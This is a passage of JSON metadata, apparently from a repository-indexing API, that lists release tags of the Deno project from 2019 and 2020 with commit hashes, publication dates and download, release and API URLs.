s/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitH